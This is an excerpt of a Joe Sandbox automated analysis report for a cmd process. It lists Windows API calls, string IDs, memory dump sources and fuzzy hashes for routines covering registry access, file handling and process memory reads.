                                                                                        • MultiByteToWideChar.API-MS-WIN-CORE-STRING-L1-1-0(00000000,00000000), ref: 00D883A0
                                                                                        • FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00003100,00000000,0000013D,00000000,?,0000000A,?), ref: 00D883D8
                                                                                        • LocalFree.API-MS-WIN-CORE-HEAP-L2-1-0(?,?), ref: 00D8840C
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068460752803.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D60000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000D8E000.00000040.80000000.00040000.00000000.sdmp
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000DAA000.00000040.80000000.00040000.00000000.sdmp
                                                                                        • Associated: 0000000F.00000002.2068461251943.0000000000DAE000.00000040.80000000.00040000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_d60000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID: FormatMessage$ByteCharFreeLocalMultiWide_ultoa
                                                                                        • String ID: (#$Application$System
                                                                                        • API String ID: 3377411628-593978566
                                                                                        • Opcode ID: 9aacf2bd71737e198e0b6ff75cff19076dee3e5d6e515819e7fc89ed287b8e8c
                                                                                        • Instruction ID: e610a3b012516e54d128b622978db725deb13649abf234fa583279ffbbc3f92d
                                                                                        • Opcode Fuzzy Hash: 9aacf2bd71737e198e0b6ff75cff19076dee3e5d6e515819e7fc89ed287b8e8c
                                                                                        • Instruction Fuzzy Hash: E7314D71A00308ABDB10DFA9DC44DAE7BB9EB49710F504229F911D7291EB709A05CF71
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0(?,00000004,?,?,00000000,?,?,?,00D75134,-00000001), ref: 00D75294
                                                                                        • RemoveDirectoryW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000004,?,?,00000000,?,?,?,00D75134,-00000001), ref: 00D752A4
                                                                                        • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,00000004,?,?,00000000,?,?,?,00D75134,-00000001), ref: 00D81036
                                                                                        • GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,00000004,?,?,00000000,?,?,?,00D75134,-00000001), ref: 00D81048
                                                                                        • SetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0(?,00000000,?,?,?,00000004,?,?,00000000,?,?,?,00D75134,-00000001), ref: 00D81064
                                                                                        • RemoveDirectoryW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000000,?,?,?,00000004,?,?,00000000,?,?,?,00D75134,-00000001), ref: 00D81073
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068460752803.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D60000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000D8E000.00000040.80000000.00040000.00000000.sdmp
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000DAA000.00000040.80000000.00040000.00000000.sdmp
                                                                                        • Associated: 0000000F.00000002.2068461251943.0000000000DAE000.00000040.80000000.00040000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_d60000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID: AttributesDirectoryFileRemove$ErrorFullLastNamePath
                                                                                        • String ID: :$\
                                                                                        • API String ID: 3961617410-1166558509
                                                                                        • Opcode ID: 0ddce9f5eba17e032ffdeaeda6e38b53ee6a37beaaca9ffd612bb8d9e7b3a07f
                                                                                        • Instruction ID: 9ee1f291ac6fa22591e3059b0a8cbe05c847df950fa48cef405c83c19d4b3052
                                                                                        • Opcode Fuzzy Hash: 0ddce9f5eba17e032ffdeaeda6e38b53ee6a37beaaca9ffd612bb8d9e7b3a07f
                                                                                        • Instruction Fuzzy Hash: FF112C35900714AF8B206B38AC4857F777CEF467507098218E806D2299FBB1CC85D2BB
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • memset.MSVCRT ref: 00D71665
                                                                                        • memset.MSVCRT ref: 00D71689
                                                                                        • memset.MSVCRT ref: 00D716AD
                                                                                        • memset.MSVCRT ref: 00D716D1
                                                                                          • Part of subcall function 00D6E3F0: memset.MSVCRT ref: 00D6E455
                                                                                        • ??_V@YAXPAX@Z.MSVCRT ref: 00D717CF
                                                                                        • ??_V@YAXPAX@Z.MSVCRT ref: 00D717E9
                                                                                        • ??_V@YAXPAX@Z.MSVCRT ref: 00D71801
                                                                                        • ??_V@YAXPAX@Z.MSVCRT ref: 00D71813
                                                                                          • Part of subcall function 00D7260E: GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(00000000,?,?,00D71775,-00000001,-00000001,-00000001,-00000001), ref: 00D72650
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068460752803.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D60000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000D8E000.00000040.80000000.00040000.00000000.sdmp
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000DAA000.00000040.80000000.00040000.00000000.sdmp
                                                                                        • Associated: 0000000F.00000002.2068461251943.0000000000DAE000.00000040.80000000.00040000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_d60000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID: memset$BufferConsoleInfoScreen
                                                                                        • String ID:
                                                                                        • API String ID: 1034426908-0
                                                                                        • Opcode ID: be8fde1dd7a5da824b32db966c44aec3a72fd653f35adaa4c8d51d16808d3257
                                                                                        • Instruction ID: c67fde961efcbf721473102f7f530cc6ebcaa87142350ab04063ca448a6c37ad
                                                                                        • Opcode Fuzzy Hash: be8fde1dd7a5da824b32db966c44aec3a72fd653f35adaa4c8d51d16808d3257
                                                                                        • Instruction Fuzzy Hash: FFF16175A002199BDB249F29CC85BAAB7B5FF04304F1885A9E94DD7241EB30DE91CF71
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • memset.MSVCRT ref: 00D65A10
                                                                                        • GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,?,-00000001), ref: 00D65A53
                                                                                        • CreateDirectoryW.API-MS-WIN-CORE-FILE-L1-1-0(?,00000000), ref: 00D65A70
                                                                                        • ??_V@YAXPAX@Z.MSVCRT ref: 00D65A87
                                                                                          • Part of subcall function 00D70B12: GetDriveTypeW.API-MS-WIN-CORE-FILE-L1-1-0(?), ref: 00D70B40
                                                                                        • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00D65AA1
                                                                                        • CreateDirectoryW.API-MS-WIN-CORE-FILE-L1-1-0(?,00000000), ref: 00D65B09
                                                                                        • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00D65B13
                                                                                        • CreateDirectoryW.API-MS-WIN-CORE-FILE-L1-1-0(?,00000000), ref: 00D65B70
                                                                                        • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00D79B7C
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068460752803.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D60000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000D8E000.00000040.80000000.00040000.00000000.sdmp
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000DAA000.00000040.80000000.00040000.00000000.sdmp
                                                                                        • Associated: 0000000F.00000002.2068461251943.0000000000DAE000.00000040.80000000.00040000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_d60000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID: CreateDirectoryErrorLast$DriveFullNamePathTypememset
                                                                                        • String ID:
                                                                                        • API String ID: 402963468-0
                                                                                        • Opcode ID: 446db97249c1e41f808ab0bb6f2563ca658cfb24cc700ec7943bcb565ffad08e
                                                                                        • Instruction ID: 7c008dbd9b11c55cfafc53d55bed6cfdc837778cb30d0e6b66f681a61668027f
                                                                                        • Opcode Fuzzy Hash: 446db97249c1e41f808ab0bb6f2563ca658cfb24cc700ec7943bcb565ffad08e
                                                                                        • Instruction Fuzzy Hash: 6591E532A016169BDB24DBA9EC95B7BB7B4EF89310F1881A5E509D7284F770DD80C770
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00000000,00000000,00000001,?,00000000,00000001,00D89E02,?,?,00D89E02), ref: 00D84618
                                                                                        • AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(00DA8E04,?,00D89E02), ref: 00D84637
                                                                                        • ReadFile.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00D9A7F0,00D89E02,?,00000000,?,00D89E02), ref: 00D84646
                                                                                        • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(00DA8E04,?,00D89E02), ref: 00D84653
                                                                                        • memcmp.MSVCRT ref: 00D84693
                                                                                        • MultiByteToWideChar.API-MS-WIN-CORE-STRING-L1-1-0(?,00000000,00D89E02,00000000,?,00D89E02,?,00D89E02), ref: 00D84720
                                                                                        • SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(?,00D89E02,00000000,00000000,?,00D89E02), ref: 00D84742
                                                                                        • AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(00DA8E04,?,00D89E02), ref: 00D8474F
                                                                                        • ReadFile.API-MS-WIN-CORE-FILE-L1-1-0(?,00D9A7F1,00000001,?,00000000,?,00D89E02), ref: 00D84764
                                                                                        • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(00DA8E04,?,00D89E02), ref: 00D84771
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068460752803.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D60000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000D8E000.00000040.80000000.00040000.00000000.sdmp
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000DAA000.00000040.80000000.00040000.00000000.sdmp
                                                                                        • Associated: 0000000F.00000002.2068461251943.0000000000DAE000.00000040.80000000.00040000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_d60000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID: FileLockShared$AcquirePointerReadRelease$ByteCharMultiWidememcmp
                                                                                        • String ID:
                                                                                        • API String ID: 2002953238-0
                                                                                        • Opcode ID: e1ecbba5548498613e17e04c88af20c713b24c9dc5421279d1eea4f64c3bb4b9
                                                                                        • Instruction ID: 741961609a9aa0ae6d1e6ec88786f5bfba79e0faff70b7eedd13ff604c9b69ab
                                                                                        • Opcode Fuzzy Hash: e1ecbba5548498613e17e04c88af20c713b24c9dc5421279d1eea4f64c3bb4b9
                                                                                        • Instruction Fuzzy Hash: C351D272A40306AFDB21AF68CC45BB9BBB9EF42710F18415AF855DB290E7718D40CBB1
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • MultiByteToWideChar.API-MS-WIN-CORE-STRING-L1-1-0(?,00000001,00D9A7F0,00000000,?,00000200), ref: 00D6C818
                                                                                        • wcschr.MSVCRT ref: 00D6C882
                                                                                        • _get_osfhandle.MSVCRT ref: 00D6C8BA
                                                                                        • SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000), ref: 00D6C8C4
                                                                                        • _get_osfhandle.MSVCRT ref: 00D6C8DB
                                                                                        • GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(00000000), ref: 00D6C8ED
                                                                                        • SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00000000,00000000,00000001), ref: 00D6C90D
                                                                                        • AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(00DA8E04), ref: 00D6C91E
                                                                                        • ReadFile.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00D9A7F0,00000200,00000000,00000000), ref: 00D6C934
                                                                                        • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(00DA8E04), ref: 00D6C941
                                                                                        • _get_osfhandle.MSVCRT ref: 00D6CAC4
                                                                                        • SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000), ref: 00D6CACE
                                                                                        • memcmp.MSVCRT ref: 00D7D16E
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068460752803.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D60000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000D8E000.00000040.80000000.00040000.00000000.sdmp
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000DAA000.00000040.80000000.00040000.00000000.sdmp
                                                                                        • Associated: 0000000F.00000002.2068461251943.0000000000DAE000.00000040.80000000.00040000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_d60000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID: File$Pointer_get_osfhandle$LockShared$AcquireByteCharMultiReadReleaseTypeWidememcmpwcschr
                                                                                        • String ID:
                                                                                        • API String ID: 1383533039-0
                                                                                        • Opcode ID: 4bf16a3ad9a696c11853781482a10f5c8d1238e8ad0d9e686b5cb9388a249ca6
                                                                                        • Instruction ID: 61adda91d603756380ada555cfda6d4841c11adbce0b2be6156509505d73302f
                                                                                        • Opcode Fuzzy Hash: 4bf16a3ad9a696c11853781482a10f5c8d1238e8ad0d9e686b5cb9388a249ca6
                                                                                        • Instruction Fuzzy Hash: 0D411671A103184BEB308B588C89BB977B6AF49300F58119AF40DD7290DBB58D91CFBA
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068460752803.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D60000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000D8E000.00000040.80000000.00040000.00000000.sdmp
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000DAA000.00000040.80000000.00040000.00000000.sdmp
                                                                                        • Associated: 0000000F.00000002.2068461251943.0000000000DAE000.00000040.80000000.00040000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_d60000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID: _wcsicmp
                                                                                        • String ID: CMDEXTVERSION$DEFINED$ERRORLEVEL$EXIST$NOT
                                                                                        • API String ID: 2081463915-1668778490
                                                                                        • Opcode ID: 99841dc4eb90c27503516fe1f8c3364404b81d192f0bfe186a3436037c544780
                                                                                        • Instruction ID: 754f7ba991d07dc67860ec331a07e4991b638ed046c04368037472cbfc45c36d
                                                                                        • Opcode Fuzzy Hash: 99841dc4eb90c27503516fe1f8c3364404b81d192f0bfe186a3436037c544780
                                                                                        • Instruction Fuzzy Hash: 36218871204706DBE7682B79A81673A6A98DB45364F68851EF489C11C1FFF5D840CB36
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068460752803.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D60000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000D8E000.00000040.80000000.00040000.00000000.sdmp
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000DAA000.00000040.80000000.00040000.00000000.sdmp
                                                                                        • Associated: 0000000F.00000002.2068461251943.0000000000DAE000.00000040.80000000.00040000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_d60000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID: _get_osfhandlememset
                                                                                        • String ID: DPATH
                                                                                        • API String ID: 3784859044-2010427443
                                                                                        • Opcode ID: dae0df5b1a763656e1a9d792b01128836201ecdbd6288709c06d47db46fc0542
                                                                                        • Instruction ID: a95e09a46d0929b08797cd8ad92d251b9b1f9f5b26a3a6e9df0450e3fb3d7b6e
                                                                                        • Opcode Fuzzy Hash: dae0df5b1a763656e1a9d792b01128836201ecdbd6288709c06d47db46fc0542
                                                                                        • Instruction Fuzzy Hash: E4A1D231A002019FCB24AF78CC5597AB7B5EF89724B18861DE49AE7294EB70EC41CF71
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • _get_osfhandle.MSVCRT ref: 00D84A7B
                                                                                        • GetLocalTime.API-MS-WIN-CORE-SYSINFO-L1-1-0(?,00000002,?), ref: 00D84B98
                                                                                        • SetLocalTime.API-MS-WIN-CORE-SYSINFO-L1-1-0(?,?), ref: 00D84BC5
                                                                                        • SetLocalTime.API-MS-WIN-CORE-SYSINFO-L1-1-0(?), ref: 00D84BD2
                                                                                        • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00D84BDC
                                                                                        • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000), ref: 00D84C30
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068460752803.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D60000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000D8E000.00000040.80000000.00040000.00000000.sdmp
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000DAA000.00000040.80000000.00040000.00000000.sdmp
                                                                                        • Associated: 0000000F.00000002.2068461251943.0000000000DAE000.00000040.80000000.00040000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_d60000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID: LocalTime$ErrorLast$_get_osfhandle
                                                                                        • String ID: %s$/-.
                                                                                        • API String ID: 1033501010-531045382
                                                                                        • Opcode ID: 8c82eda922a9bf37bf47119183cadec4ae0f3e48b70b7e2c3b02f4f5567f915f
                                                                                        • Instruction ID: 45fce863cb865cea265a1838d9369535b08f752661cc17258ece7eb84701700b
                                                                                        • Opcode Fuzzy Hash: 8c82eda922a9bf37bf47119183cadec4ae0f3e48b70b7e2c3b02f4f5567f915f
                                                                                        • Instruction Fuzzy Hash: 52810332A4021747DB28BB78CC45ABB73A9EF94710F58416AE402DB294EE71DE45CB38
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,00000000,02000000,?), ref: 00D86745
                                                                                        • RegCreateKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,00000000,00000000,00000000,02000000,00000000,?,?), ref: 00D867CF
                                                                                        • RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(?), ref: 00D867F6
                                                                                        • RegSetValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,00D620B8,00000000,00000002,?,00000000), ref: 00D86867
                                                                                        • RegDeleteValueW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,00000000), ref: 00D868A3
                                                                                        • RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(?), ref: 00D868C5
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068460752803.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D60000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000D8E000.00000040.80000000.00040000.00000000.sdmp
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000DAA000.00000040.80000000.00040000.00000000.sdmp
                                                                                        • Associated: 0000000F.00000002.2068461251943.0000000000DAE000.00000040.80000000.00040000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_d60000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID: CloseValue$CreateDeleteOpen
                                                                                        • String ID: %s=%s$\Shell\Open\Command
                                                                                        • API String ID: 4081037667-3301834661
                                                                                        • Opcode ID: 93ed6f861eab8c11b08233b9110493c00d9d0aaaab95fcae00e386dadbd68324
                                                                                        • Instruction ID: 69cd9839159c2d8ca4f76efb40112cb8d11468c7a9c37fa88d3b0a09f0e395a2
                                                                                        • Opcode Fuzzy Hash: 93ed6f861eab8c11b08233b9110493c00d9d0aaaab95fcae00e386dadbd68324
                                                                                        • Instruction Fuzzy Hash: 3C61FA759002259BDF34AB24CC49BBA77B8EF54710F1941AAF849E7290EA31CE44CBB1
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

APIs
• RegCreateKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,00000000,00000000,00000000,00000002,00000000,?,00000000,00D8CD00,00000018,?,?,00D7BFD6), ref: 00D8650F
• RegSetValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(00000000,00000000,00000000,00000001,?,00000000,?,?,00000000,00000000,00000000,00000002,00000000,?,00000000,00D8CD00), ref: 00D86545
• RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(00000000,?,?,00000000,00000000,00000000,00000002,00000000,?,00000000,00D8CD00,00000018,?,?,00D7BFD6), ref: 00D86553
• RegDeleteKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,00000000,00000000,00D8CD00,00000018,?,?,00D7BFD6), ref: 00D86590
• RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,00000000,02000000,?,?,?,00000000,00000000,00D8CD00,00000018,?,?,00D7BFD6), ref: 00D865AD
• RegDeleteValueW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,00D620B8,?,00000000,02000000,?,?,?,00000000,00000000,00D8CD00,00000018,?,?,00D7BFD6), ref: 00D865D4
• RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,00000000,02000000,?,?,?,00000000,00000000,00D8CD00,00000018,?,?,00D7BFD6), ref: 00D865EF
Strings
Memory Dump Source
• Source File: 0000000F.00000002.2068460752803.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D60000, based on PE: true
• Associated: 0000000F.00000002.2068460752803.0000000000D8E000.00000040.80000000.00040000.00000000.sdmp
• Associated: 0000000F.00000002.2068460752803.0000000000DAA000.00000040.80000000.00040000.00000000.sdmp
• Associated: 0000000F.00000002.2068461251943.0000000000DAE000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_d60000_cmd.jbxd
Similarity
• API ID: CloseDeleteValue$CreateOpen
• String ID: %s=%s
• API String ID: 1019019434-1087296587
• Opcode ID: 01bfc3ada652f34bed0d9e4fd642460ba95987e013dc213c016e08b0985cf573
• Instruction ID: 607c0700d8dd1c965591af5a68dbc74880fed81709069b7b1be4bddedbe66475
• Instruction Fuzzy Hash: 7E41B072D04215ABDB31AB55DC09FAF7B78EBC6F60F044159F805A7250D7268E01CBB4
Uniqueness
Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 0000000F.00000002.2068460752803.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D60000, based on PE: true
• Associated: 0000000F.00000002.2068460752803.0000000000D8E000.00000040.80000000.00040000.00000000.sdmp
• Associated: 0000000F.00000002.2068460752803.0000000000DAA000.00000040.80000000.00040000.00000000.sdmp
• Associated: 0000000F.00000002.2068461251943.0000000000DAE000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_d60000_cmd.jbxd
Similarity
• API ID: _wcsnicmpswscanf
• String ID: :EOF
• API String ID: 1534968528-551370653
• Opcode ID: 6f6e08943a61d7304087072dbf3aa2cd0f736a5c8d333dfc0d651c57df19d9f2
• Instruction ID: 8dd0d01e02d5393d32d1f697cf0feff94eddb7d8ca1eaa20c85332791887aa4d
• Instruction Fuzzy Hash: 91314831A08354ABC720AB98DC45B7A77A8EF86718F18501AF985D7391EB38CC41CBB5
Uniqueness
Uniqueness Score: -1.00%

APIs
• LoadLibraryExW.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(NTDLL.DLL,00000000,00000000,?,00000000,?), ref: 00D86069
• GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(00000000,NtQueryInformationProcess), ref: 00D8607E
• ReadProcessMemory.API-MS-WIN-CORE-MEMORY-L1-1-0(?,?,?,00000480,?), ref: 00D860DC
• ReadProcessMemory.API-MS-WIN-CORE-MEMORY-L1-1-0(?,?,?,00000004,00000000), ref: 00D86128
• ReadProcessMemory.API-MS-WIN-CORE-MEMORY-L1-1-0(?,?,?,00000002,00000000), ref: 00D8614F
• ReadProcessMemory.API-MS-WIN-CORE-MEMORY-L1-1-0(?,00000000,?,00000002,00000000), ref: 00D86186
Strings
Memory Dump Source
• Source File: 0000000F.00000002.2068460752803.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D60000, based on PE: true
• Associated: 0000000F.00000002.2068460752803.0000000000D8E000.00000040.80000000.00040000.00000000.sdmp
• Associated: 0000000F.00000002.2068460752803.0000000000DAA000.00000040.80000000.00040000.00000000.sdmp
• Associated: 0000000F.00000002.2068461251943.0000000000DAE000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_d60000_cmd.jbxd
Similarity
• API ID: MemoryProcessRead$AddressLibraryLoadProc
• String ID: NTDLL.DLL$NtQueryInformationProcess
• API String ID: 1580871199-2613899276
• Opcode ID: 1fcd76838bfeef93703da4196859e295eb9705063fc043cd9d0d0de6e2155008
• Instruction ID: 97224f24cee8ef948cda6d123f25210d3a89a316e9a52d1f126f38f41b1cbdc4
• Instruction Fuzzy Hash: 804130B0A00319ABDB20AB25DC89BBAB77CEB45754F0441A9A605E3242DB70DE45CB79
Uniqueness
Uniqueness Score: -1.00%

APIs
• _wcsicmp.MSVCRT ref: 00D765A4
• CreateFileW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,80000000,00000001,00000000,00000003,08000080,00000000), ref: 00D765D7
• _open_osfhandle.MSVCRT ref: 00D765EB
• CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(00000000,?), ref: 00D82092
Strings
Memory Dump Source
• Source File: 0000000F.00000002.2068460752803.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D60000, based on PE: true
• Associated: 0000000F.00000002.2068460752803.0000000000D8E000.00000040.80000000.00040000.00000000.sdmp
• Associated: 0000000F.00000002.2068460752803.0000000000DAA000.00000040.80000000.00040000.00000000.sdmp
• Associated: 0000000F.00000002.2068461251943.0000000000DAE000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_d60000_cmd.jbxd
Similarity
• API ID: CloseCreateFileHandle_open_osfhandle_wcsicmp
• String ID: con
• API String ID: 689241570-4257191772
• Opcode ID: 7d4bbd4ddcff1fd611ec50e3965befaa2f936335d088f82eee1efce2069473e4
• Instruction ID: 917f65418a72cad7289b3e832c921a4f2744f851a153fad3cf4f693800fc36b0
• Instruction Fuzzy Hash: BE31F132A04715AFD7249BA89C49B7F7AA9E745334F24822AE456E32C4FB70DD00D771
Uniqueness
Uniqueness Score: -1.00%

APIs
• CreateFileW.API-MS-WIN-CORE-FILE-L1-1-0(?,80000000,00000001,00000000,00000003,00000080,00000000,?,00000000,00000104), ref: 00D861D7
• SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000,?,00000000,00000000,00000040), ref: 00D86211
• GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,?,00000014,00000004), ref: 00D86254
• HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 00D8625B
• GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000000,?), ref: 00D8628D
• RtlFreeHeap.NTDLL(00000000), ref: 00D86294
• CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(00000000,00000040), ref: 00D8629B
Strings
Memory Dump Source
• Source File: 0000000F.00000002.2068460752803.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D60000, based on PE: true
• Associated: 0000000F.00000002.2068460752803.0000000000D8E000.00000040.80000000.00040000.00000000.sdmp
• Associated: 0000000F.00000002.2068460752803.0000000000DAA000.00000040.80000000.00040000.00000000.sdmp
• Associated: 0000000F.00000002.2068461251943.0000000000DAE000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_d60000_cmd.jbxd
Similarity
• API ID: Heap$FileProcess$AllocCloseCreateFreeHandlePointer
• String ID: PE
• API String ID: 3093239467-4258593460
• Opcode ID: eff83ff58ea7062c240b8ce831efbf82e526c49a7e3ba92b0fc6c933667eff3d
• Instruction ID: be9f650e9e26ba9d103357dfb389d086611af0dc224a8b9aedb7a80832af6da6
